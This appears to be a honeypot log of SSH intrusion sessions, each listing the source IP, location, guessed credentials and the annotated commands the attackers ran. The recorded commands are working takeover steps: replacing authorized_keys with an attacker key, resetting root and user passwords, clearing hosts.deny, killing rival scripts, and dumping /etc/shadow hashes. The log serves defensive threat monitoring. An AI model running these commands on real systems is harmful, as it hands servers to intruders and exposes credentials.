$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_4 (43.156.46.210) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-06-02 19:54 EDT Β· as sonar/sonar123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "sonar123\nLET2yRgL252i\nLET2yRgL252i"|passwd|bash
$ Enter new UNIX password:
$ echo "sonar123\nLET2yRgL252i\nLET2yRgL252i\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_34 (103.154.77.48) β€” Sleman, Indonesia Β· 1 session Β· 19 cmds
2026-06-02 19:46 EDT Β· as root/Cc123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:pcpsL1r7AQ2z"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 star_root_22 (51.81.186.75) β€” Hillsboro, United States Β· 1 session Β· 2 cmds
2026-06-02 16:43 EDT Β· as root/Jimster2025
echo β†’ (7*6
$ echo $((7*6)); hostname; uname -r
$ (7*6
🎭 specter_root_41 (202.60.229.176) β€” Kwun Tong, Hong Kong Β· 2 sessions Β· 39 cmds
2026-06-02 16:16 EDT Β· as diego/1234, root/QazWsx123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "1234\n3JFGCeOJGWlh\n3JFGCeOJGWlh"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\n3JFGCeOJGWlh\n3JFGCeOJGWlh\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:OaGN8JTSTdHI"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 phantom_3 (41.204.63.118) β€” Accra, Ghana Β· 1 session Β· 20 cmds
2026-06-02 16:09 EDT Β· as diego/1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1234\nvJ4OSg7xANQv\nvJ4OSg7xANQv"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\nvJ4OSg7xANQv\nvJ4OSg7xANQv\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dutch_sol_5 (176.65.139.242) β€” Eygelshoven, The Netherlands Β· 1 session Β· 1 cmd
2026-06-02 15:00 EDT Β· as root/r00t
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 kimchi_root_6 (211.234.111.116) β€” Gwangmyeong, South Korea Β· 1 session Β· 1 cmd
2026-06-02 14:36 EDT Β· as root/Crypt0lend!fy
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ echo aGWEHCgOyBZZQm0Hh5gx;ps -ejfH;top -n1 -b|head;uname -a;free -m;nproc;netstat -ltpn;ifconfig || ip a;df -h;netstat -altunpe|grep -e ESTAB -e LISTEN|sort || ss -altunpe|grep -e ESTAB -e LISTEN|sort;echo 'logged users:';w;echo 'lastlog info:';lastlog|grep -v Never;echo 'last logged:';last|head -20;uname -a; grep -vi -e false -e nologin /etc/passwd|grep 'bin/.*sh$';echo ----------;cat .*_history;ls -lta /tmp|head -100;uname -m;docker ps;cat /etc/shadow|grep -F -v -e '*:' -e ':!' // password hash extraction
🎭 shadow_6 (83.219.248.100) β€” Warsaw, Poland Β· 1 session Β· 20 cmds
2026-06-02 10:29 EDT Β· as beheer/beheer123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "beheer123\nXJz2ouHLJ2be\nXJz2ouHLJ2be"|passwd|bash
$ Enter new UNIX password:
$ echo "beheer123\nXJz2ouHLJ2be\nXJz2ouHLJ2be\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_sol (114.111.52.109) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-06-02 10:07 EDT Β· as cjxy/cjxy
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "cjxy\nGEqlZWmHDiEg\nGEqlZWmHDiEg"|passwd|bash
$ Enter new UNIX password:
$ echo "cjxy\nGEqlZWmHDiEg\nGEqlZWmHDiEg\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 scone_root_3 (195.96.138.233) β€” Luton, United Kingdom Β· 3 sessions Β· 3 cmds
2026-06-02 04:47 EDT Β· as admin/admin
config (repeated config 3x)
$ config Γ—3
🎭 cowboy_root_23 (43.162.82.212) β€” Santa Clara, United States Β· 3 sessions Β· 60 cmds
2026-06-02 08:31 EDT Β· as ftpuser/ftpuser0, manager/friend, user53/user53
config (repeated config 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "friend\nboxTmSmqZIlJ\nboxTmSmqZIlJ"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "friend\nboxTmSmqZIlJ\nboxTmSmqZIlJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "ftpuser0\nrb9j2rwq05Zu\nrb9j2rwq05Zu"|passwd|bash
$ echo "ftpuser0\nrb9j2rwq05Zu\nrb9j2rwq05Zu\n"|passwd
$ echo -e "user53\nHMEv6Od836wr\nHMEv6Od836wr"|passwd|bash
$ echo "user53\nHMEv6Od836wr\nHMEv6Od836wr\n"|passwd
🎭 chai_root_11 (43.242.226.214) β€” Panvel, India Β· 1 session Β· 20 cmds
2026-06-02 08:33 EDT Β· as arthur/123456
config (repeated config 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nju1GXTCDEURM\nju1GXTCDEURM"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nju1GXTCDEURM\nju1GXTCDEURM\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 maple (20.220.34.26) β€” Toronto, Canada Β· 1 session Β· 20 cmds
2026-06-02 08:19 EDT Β· as manager/friend
config (repeated config 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "friend\nRXi4jPd43Ut3\nRXi4jPd43Ut3"|passwd|bash
$ Enter new UNIX password:
$ echo "friend\nRXi4jPd43Ut3\nRXi4jPd43Ut3\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_52 (152.32.214.226) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-06-02 07:56 EDT Β· as es1/es1
config (repeated config 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "es1\nokqC9VjrdMEa\nokqC9VjrdMEa"|passwd|bash
$ Enter new UNIX password:
$ echo "es1\nokqC9VjrdMEa\nokqC9VjrdMEa\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 hanbok_root_6 (121.165.187.77) β€” Seocho-gu, South Korea Β· 1 session Β· 9 cmds
2026-06-02 07:35 EDT Β· as root/123456
config (repeated config 3x)
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 wok_root_9 (14.103.111.127) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-06-02 04:26 EDT Β· as root/P@ssword12345
config (repeated config 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:bM3l68GB68rw"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_28 (64.188.17.103) β€” Los Angeles, United States Β· 1 session Β· 19 cmds
2026-06-02 04:22 EDT Β· as root/legend1
config (repeated config 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ryqeWxN7kElW"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_40 (154.221.17.137) β€” Chai Wan, Hong Kong Β· 1 session Β· 19 cmds
2026-06-02 03:45 EDT Β· as root/changeme123
config (repeated config 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ycO3SP5sSNWo"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 tiger_root_8 (20.235.225.32) β€” Pune, India Β· 1 session Β· 19 cmds
2026-06-02 01:37 EDT Β· as root/Abcd1234!
config (repeated config 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
